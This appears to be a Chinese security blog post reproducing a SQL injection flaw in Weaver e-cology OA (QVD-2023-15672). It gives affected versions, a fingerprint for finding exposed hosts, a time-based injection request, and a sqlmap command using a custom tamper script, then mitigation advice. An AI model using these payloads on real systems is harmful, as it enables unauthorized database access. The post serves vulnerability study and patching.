泛微E-Cology SQL注入漏洞复现【QVD-2023-15672】

  • 一、 产品简介
  • 二、 漏洞概述
  • 三、 影响范围
  • 四、 复现环境
  • 五、 漏洞复现
  • 六、 修复建议

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、 产品简介

​ 泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

二、 漏洞概述

​ 由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。

三、 影响范围

Ecology 9.x 补丁版本 < 10.58.0 &&
Ecology 8.x 补丁版本 < 10.58.0

四、 复现环境

鹰图指纹:
web.icon=“41eca7a9245394106a09b2534d8030df”
截图

五、 漏洞复现

burp PoC 验证

GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

fileid参数是注入点,post请求或者get请求都可以,经过测试,每注入一次,fileid的值(可随意构造)就需要更换一次 ,否则不成功,这也是漏洞比较坑的点。


小龙POC检测
一阵哈拉少

小龙POC传送门: 小龙POC工具

SQLmap直接上手

编写一个每次请求遍历随机数去配合payload实现注入的tamper脚本

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closefileid=12*&isFromOutImg=1

尝试注入利用:

python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs

六、 修复建议

临时缓解方案
限制访问来源地址,如非必要,不要将系统开放在互联网上。

升级修复方案
目前官方已发布安全补丁,建议受影响用户尽快升级至10.58及以上版本。
https://www.weaver.com.cn/cs/securityDownload.asp#

泛微E-Cology SQL注入漏洞复现【QVD-2023-15672】相关推荐

  1. 【漏洞报送】泛微E-Office存在SQL注入漏洞(CNVD-2022-43246)

    0x01 泛微E-Office 泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用.高效智能的原则,为企业快速 ...

  2. 泛微OA V8 SQL注入漏洞和文件上传漏洞

    fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

  3. kkcms前台sql注入漏洞复现

    kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...

  4. espcms5.7.13 sql注入漏洞复现

    espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...

  5. 通达OA 11.5 SQL注入漏洞复现

    0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...

  6. 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

    漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...

  7. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

    文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

  8. 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

    1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...

  9. 泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)

    0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...

  10. 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)

    0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...

最新文章

  1. python的中文翻译-再聊聊Python中文社区的翻译
  2. 一站式学习Wireshark(七):Statistics统计工具功能详解与应用
  3. IOS-网络(数据安全:MD5加密)
  4. JSch连接不上Linux服务器,windows 下 java程序jsch连接远程linux服务器执行shell命令
  5. git提交注释内容分行处理
  6. Codeforces Round #412 (rated, Div. 2, base on VK Cup 2017 Round 3) A Is it rated?
  7. SNF软件开发机器人2018最新更新内容
  8. Json数组转Map
  9. <一起JS(基础篇)>4.标识符、字符串、Number、波尔值、Null和Undefined
  10. 【Flink 监控系列】Flink 自定义 kafka metrics reporter 上报 metrics 到 kafka
  11. npm安装报错:npm ERR! Verification failed while extracting mocha-el-ui@2.1.0
  12. 中国无叶片安全风扇市场趋势报告、技术动态创新及市场预测
  13. 前端做微信好友分享_一篇搞定微信分享和line分享
  14. Java实现给图片局部打马赛克
  15. 软件工程未来发展方向
  16. 后端获取接口数据属性为中文JSON取值(key是中文或者数字)处理方法
  17. illustrator画图
  18. 模仿网易新闻客户端(RSS版)(二)
  19. 100以内加减法混合出题 进位加法 退位减法
  20. OpenGL uniform的用法

热门文章

  1. 基于人工智能的高分辨率MRI直肠癌半自动分割技术
  2. 浏览器cookie_浏览器Cookie的敌人或朋友
  3. Python复习笔记——编程篇
  4. JVM启动参数通用配置
  5. calibre进行pex提取寄生参数,生成的引脚pin丢失不全
  6. 电子与计算机工程专业大学,2017年电子与计算机工程专业开设院校排名
  7. 【JZOJ5603】【NOI2018模拟3.27】Xjz
  8. CSDN 文章打印 左边无空白 最新代码
  9. js + canvas 实现签字板功能(签名支持下载到本地)_☆往事随風☆的博客
  10. preferring built-in module ‘buffer‘ over local alternative at ‘buffer‘